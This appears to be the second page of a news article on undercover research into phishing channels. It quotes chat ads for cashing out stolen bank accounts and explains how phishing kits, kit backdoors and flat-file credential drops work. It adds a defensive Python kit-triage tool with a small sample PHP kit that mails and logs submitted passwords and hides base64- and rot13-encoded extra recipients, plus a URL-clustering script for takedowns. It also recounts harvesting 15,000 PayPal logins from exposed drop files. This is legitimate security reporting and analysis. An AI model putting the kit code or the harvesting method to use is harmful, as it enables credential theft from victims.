Going Undercover in the Slimy World of Phishing - Page 2


Cloudmark published a whitepaper on the undercover work in which the company quoted this sample discussion from a phishing channel:

14:29 < Droper> cashout any us bank like Wachovia,Wells,Chase,Citibank,Boa,Wamu and all uk banks and some Canada Banks also Pick WU and MG and drops for merchandise and drop for Billpay msg me for deal
14:31 < jiciuvyu> i have e-gold,root,paypal,poste.it,php mailer,php sender inbox,scam pages,ebay extractor,mail extractor,bank logins,and need wells drop prv me

The user with the handle "Droper" is a casher: someone who turns compromised accounts into money. He or she is advertising the banks whose accounts can be cashed out, along with pickup of Western Union ("WU") and MoneyGram ("MG") transfers and "drops" (mule accounts and mailing addresses) for merchandise and bill-pay fraud. The other user, "jiciuvyu," is advertising an inventory of phishing tools and stolen data (e-gold and PayPal accounts, "root" access to compromised servers, PHP mailers, scam pages, bank logins) and is asking for a "wells drop," meaning a Wells Fargo account into which stolen money can be transferred, or "dropped." "prv me" is an invitation to continue in private messages.



After talking the talk for a few weeks, Harbert convinced users to send him tools and complete phishing kits. The kits contained HTML files, PHP scripts and assorted other Web files.

A would-be phisher simply unzips a kit and uploads it to a Web server, where it becomes a working phishing site. The phisher writes his or her e-mail address into the kit's configuration file; when a victim submits credentials to the fake page, the kit's server-side script forwards the captured data to that address automatically.

What surprised Harbert, he said, was to find that the variety of kits all shared a common set of back-end files—what he calls the "brain files," with the same names.

Phishing monitoring companies are seeing an explosion of these kits, which is not surprising given that they're "simple, easy and cheap" to run, Harbert said.

Looking deeper, he discovered that novice phishers are themselves being scammed by more advanced phishers. The advanced phishers write and sell kits that contain hidden, obfuscated code that e-mails the stolen information not only to the phisher who deployed the kit but also to the phisher who wrote and sold it, so every victim the novice catches is harvested twice.

Harbert also discovered what he says is a new phishing variant: the storage of stolen information in flat text files. Besides e-mailing the data to the phisher, the kits also append everything they capture to text files in the directory of the attack itself. Harbert found that those text files carry the same handful of names from kit to kit, and those names are visible on sites that publish real-time phishing reports, Cloudmark's among them.

After writing a script that automatically retrieved those text files from the attack URLs published on such sites, Harbert was able to pull PayPal account details straight out of the flat files: user names and passwords in plain, unencrypted text. He collected 15,000 PayPal accounts that way, using no phishing techniques whatsoever, just a simple automated search over publicly available feeds.
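The three behaviours described above (a recipient set in the configuration file, a second recipient hidden in obfuscated code, and stolen data appended to flat text files in the attack directory) can all be found by static triage of a kit before it ever reaches a server. The following Python is an added example written for this page; it is not Cloudmark's or Harbert's tooling, and the kit it analyzes is a constructed miniature, not a real kit. The file names, the regular expressions and the two obfuscation methods it looks for (base64_decode and str_rot13) are assumptions chosen for illustration.

```python
import base64
import codecs
import re

# Constructed miniature of a phishing kit (written for this example; not a
# real kit). config.php holds the recipient the buyer edits; login.php mails
# the submitted credentials there, appends them to flat text files in the
# attack directory, and hides two extra recipients behind base64_decode()
# and str_rot13(): the "backdoor" the kit's author keeps for himself.
SAMPLE_KIT = {
    "config.php": '<?php\n$to = "phisher@example.com";\n',
    "login.php": (
        '<?php\n'
        'include "config.php";\n'
        '$msg = "user: " . $_POST["user"] . " pass: " . $_POST["pass"];\n'
        'mail($to, "Result", $msg);\n'
        'file_put_contents("result.txt", $msg . "\\n", FILE_APPEND);\n'
        '$fp = fopen("log.txt", "a"); fwrite($fp, $msg); fclose($fp);\n'
        'mail(base64_decode("YXV0aG9yQGV4YW1wbGUubmV0"), "Result", $msg);\n'
        'mail(str_rot13("uvqqra@rknzcyr.bet"), "Result", $msg);\n'
    ),
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
ROT13_CALL = re.compile(r"str_rot13\(\s*['\"]([^'\"]+)['\"]\s*\)")
# Literal first arguments of the PHP file-writing calls: the drop files.
WRITE_CALL = re.compile(r"\b(?:file_put_contents|fopen)\(\s*['\"]([^'\"]+)['\"]")


def decode_obfuscated(src):
    """Return the plaintext hidden behind base64_decode()/str_rot13() literals."""
    found = []
    for m in B64_CALL.finditer(src):
        try:
            found.append(base64.b64decode(m.group(1)).decode("utf-8", "replace"))
        except ValueError:  # not valid base64; skip it
            continue
    for m in ROT13_CALL.finditer(src):
        found.append(codecs.decode(m.group(1), "rot_13"))
    return found


def analyze_kit(files):
    """files maps file name -> PHP source.

    Returns the recipients written in the clear, the recipients that only
    appear after de-obfuscation (the backdoor), and the flat-file drop names.
    """
    plain, hidden, drops = set(), set(), set()
    for src in files.values():
        # Scan for addresses only after cutting the obfuscated literals out,
        # so a rot13 string that happens to look like an address is not
        # reported as a plain recipient.
        stripped = ROT13_CALL.sub("", B64_CALL.sub("", src))
        plain.update(EMAIL_RE.findall(stripped))
        for text in decode_obfuscated(src):
            hidden.update(EMAIL_RE.findall(text))
        drops.update(WRITE_CALL.findall(src))
    return {
        "recipients": sorted(plain),
        "hidden_recipients": sorted(hidden - plain),
        "drop_files": sorted(drops),
    }


if __name__ == "__main__":
    for key, values in analyze_kit(SAMPLE_KIT).items():
        print(f"{key}: {values}")
```

On the sample kit this reports phisher@example.com as the visible recipient, author@example.net and hidden@example.org as the backdoor recipients, and log.txt and result.txt as the files a deployed copy would leave readable in its Web directory. Real kits use more layers than one base64 or rot13 wrapper (eval of concatenated fragments, gzinflate, hex escapes), so a production triage tool needs a wider set of decoders; the structure of the check is the same.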

Harbert also discovered a new trend within the community: a unique attack for every victim. Kits that generate a different scam URL for each target are highly prized by phishers, because a takedown of any one URL then stops only a single victim's attack rather than the campaign.
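From the defender's side, the answer to per-victim URLs is to stop treating each URL as a separate incident and instead collapse the victim-specific token so that one campaign is reported and taken down as a unit. The following Python is an added example for this page, not code from Cloudmark or from the article; the URLs in it are constructed, and the heuristic for what counts as a per-victim token is an assumption that would be tuned against a real feed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample feed (not real phishing URLs): two campaigns that embed
# a per-victim token in the path or query, plus one static URL.
SAMPLE_URLS = [
    "http://example-host.test/bank/login/3f9a1c7e2b4d5e6f/index.php?id=9f8e7d6c5b4a3f2e",
    "http://example-host.test/bank/login/a1b2c3d4e5f60718/index.php?id=0a1b2c3d4e5f6071",
    "http://other-host.test/secure/verify.php?u=dXNlckBleGFtcGxlLmNvbQ",
    "http://other-host.test/secure/verify.php?u=Ym9iQGV4YW1wbGUuY29t",
    "http://example-host.test/bank/login/index.php",
]

# Heuristic for a per-victim token: a long hex string, a long base64/URL-safe
# blob, or a run of digits. The thresholds are assumptions; tune to the feed.
TOKEN_RE = re.compile(r"^(?:[0-9a-f]{8,}|[A-Za-z0-9_-]{16,}|\d{4,})$")


def campaign_template(url):
    """Replace token-like path segments and query values with {token}.

    Two URLs that differ only in their victim token map to the same template.
    """
    parts = urlsplit(url)
    path = "/".join("{token}" if TOKEN_RE.match(seg) else seg
                    for seg in parts.path.split("/"))
    query = []
    for pair in (parts.query.split("&") if parts.query else []):
        key, _, value = pair.partition("=")
        if TOKEN_RE.match(value):
            value = "{token}"
        query.append(key + "=" + value)
    return parts.netloc + path + ("?" + "&".join(query) if query else "")


def cluster_campaigns(urls):
    """Group URLs by template so one report covers every per-victim variant."""
    groups = defaultdict(list)
    for url in urls:
        groups[campaign_template(url)].append(url)
    return dict(groups)


if __name__ == "__main__":
    for template, members in cluster_campaigns(SAMPLE_URLS).items():
        print(f"{template}: {len(members)} URL(s)")
```

The five sample URLs collapse to three templates: the two bank-login URLs and the two verify.php URLs each become one campaign, and the static URL stands alone. Clustering on the template, and on the hosting server behind it, is what lets a takedown request cover the kit rather than one victim's link.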

Another role in the community is that of the rip-off artist who steals from the phishers. Called a "ripper," such an individual promises to cash out a compromised account but instead just takes off with the money.

Armed with such terms, Harbert said it was easy to infiltrate the community. "Just go in and talk the talk, say you're interested, that you want to make a lot of money, that you want to help them with attacks," he said. "I pretended to be a spammer. … A lot of phishers sent a kit, and I didn't do the work, and they were really kind of heartbroken. One guy told me I really hurt his feelings."

Lisa Vaas can be contacted at lisa_vaas@ziffdavisenterprise.com.
